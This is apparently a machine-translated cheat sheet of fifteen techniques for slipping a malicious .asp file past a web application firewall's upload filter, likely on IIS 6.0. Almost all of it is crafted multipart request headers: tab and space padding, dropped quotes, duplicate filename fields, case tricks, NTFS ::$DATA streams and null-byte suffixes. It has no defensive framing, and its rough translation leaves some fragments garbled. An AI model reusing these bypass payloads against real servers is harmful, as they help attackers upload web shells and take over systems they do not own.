Original link: https://www.cesafe.com/8411.html
The original request packet:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp” Content-Type: text/html
1, the file name prefix plus [0x09] bypass:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”[0x09]cesafe.asp” Content-Type: text/html
Method 2, the file name to remove the double quotes bypass:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=cesafe.asp Content-Type: text/html
Method 3, add a filename1 filename parameter, and assign bypass:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”;filename1=”test.jpg” Content-Type: text/html
Method. 4, form into a variable f + orm composition bypass:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: f+orm-data; name=”filepath”;filename=”cesafe.asp” Content-Type: text/html
Method 5, the file name suffix bypass the case:
——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.Asp” Content-Type: text/html
6. A method to remove the form-data variable bypass:
——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: name=”filepath”; filename=”cesafe.asp” Content-Type: text/html
The method of 7, the Content-Disposition: After the addition of a plurality of spaces or form-data; After the addition of a plurality of bypass spaces:
——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data ; name=”filepath”; filename=“cesafe.asp” Content-Type: text/html
Method. 8, cesafe.asp (spaces. +.) Bypasses:
——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp .” Content-Type: text/html
Method 9, "carriage return line, bypassing:
——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp ” Content-Type: text/html
Methods 10, NTFS streams in addition to the file name :: $ DATA bypass:
——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp::$DATA” Content-Type: text/html OR ——WebKitFormBoundary2smpsxFB3D0KbA7D ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp::$DATA\0x00\fuck.asp0x00.jpg” Content-Type: text/html
11, after the discovery of IIS 6.0 test, it always takes a value in the Content-Disposition first as a receiver parameter, and the value of the security dog is always the last one in the Content-Disposition parameter as a receiver. Thus attempts to request the following configuration [successful upload cesafe.asp]:
Content-Disposition: form-data; name=”FileUploadName”; filename=”cesafe.asp” —————————–15377259221471 Content-Disposition: form-data; name=”FileUploadName”; filename=”cesafe.txt” Content-Type: application/octet-stream Content-Disposition: form-data; name=”FileUploadName”; filename=”cesafe.asp” Content-Disposition: form-data; name=”FileUploadName”; filename=”cesafe.asp”
The method of 12, the Content-Type and ConTent-Disposition bypass position reverse the order of:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Type: text/html ConTent-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”
The method of 13, the file name prefix spaces ( Tab key alternatively) bypasses:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename= “cesafe.asp” Content-Type: text/html
The method of 14, before the form-data bypass spaces:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data;name=”uploaded”; filename=”cesafe.asp” Content-Type: text/html
15. A method in before or after the form-data plus + bypass:
——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: +form-data; name=”filepath”; filename=”cesafe.asp” Content-Type: text/html
Reference: https://www.cesafe.com/8411.html